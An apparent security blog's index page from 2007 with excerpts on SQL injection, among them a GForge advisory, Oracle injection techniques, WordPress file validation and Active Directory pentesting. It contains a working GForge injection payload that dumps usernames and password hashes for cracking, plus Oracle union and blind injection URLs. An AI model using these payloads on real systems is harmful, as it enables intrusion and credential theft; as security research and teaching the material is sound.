Recent Posts

Categories

Archives

Exploiting SQL Injections In Insert Statements

October 7, 2007

Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query. Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.… Read More

Gforge SQL Injection

September 13, 2007

Original Advisory: http://www.portcullis-security.com/179.php  The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points. The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database. The hashes can then be cracked using john-the-ripper. Exploit:- POST request to:/www/people/editprofile.php skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+ from+users–%3d1&MultiDelete=Delete works against… Read More

Yet Another Insecure WordPress Code

August 29, 2007

Package:- wordpress 2.2.2.zip file:/wp-admin/admin- functions.php function validate_file( $file, $allowed_files = '' ) {         if ( false !== strpos( $file, './' ))                 return 1;         if (':' == substr( $file, 1, 1 ))                 return 2;         if (!empty ( $allowed_files ) && (!in_array( $file, $allowed_files ) ) )… Read More

Pen Testing Windows Active Directory

July 28, 2007

I have put together some thoughts on conducting a penetration test on a windows active directory. Currently this article focus on these 2 scenarios:- 1. A pentester is allowed to plug his laptop into the target network. 2. A pentester is not allowed to plug his laptop and only has… Read More

SQL Injection In Oracle

July 11, 2007

1. Finding table names select table_name from+user_tables Example:- http://192.168.2.199/ora.php?id=101+union+all+select+ table_name+from+user_tables Blind Injection:http://192.168.2.199/ora.php?id=101 and ascii(substr((select+table_name+from+user_tables where rownum=1),1,1))>100 ———————————————– 2. Iterating through the different rows: Unfortunately it is not as straight forward, there is no LIMIT command in oracle. Syntax:-select column_1, column_2 from (select rownum r_, column_1, column_2  from table_1, table_2  where… Read More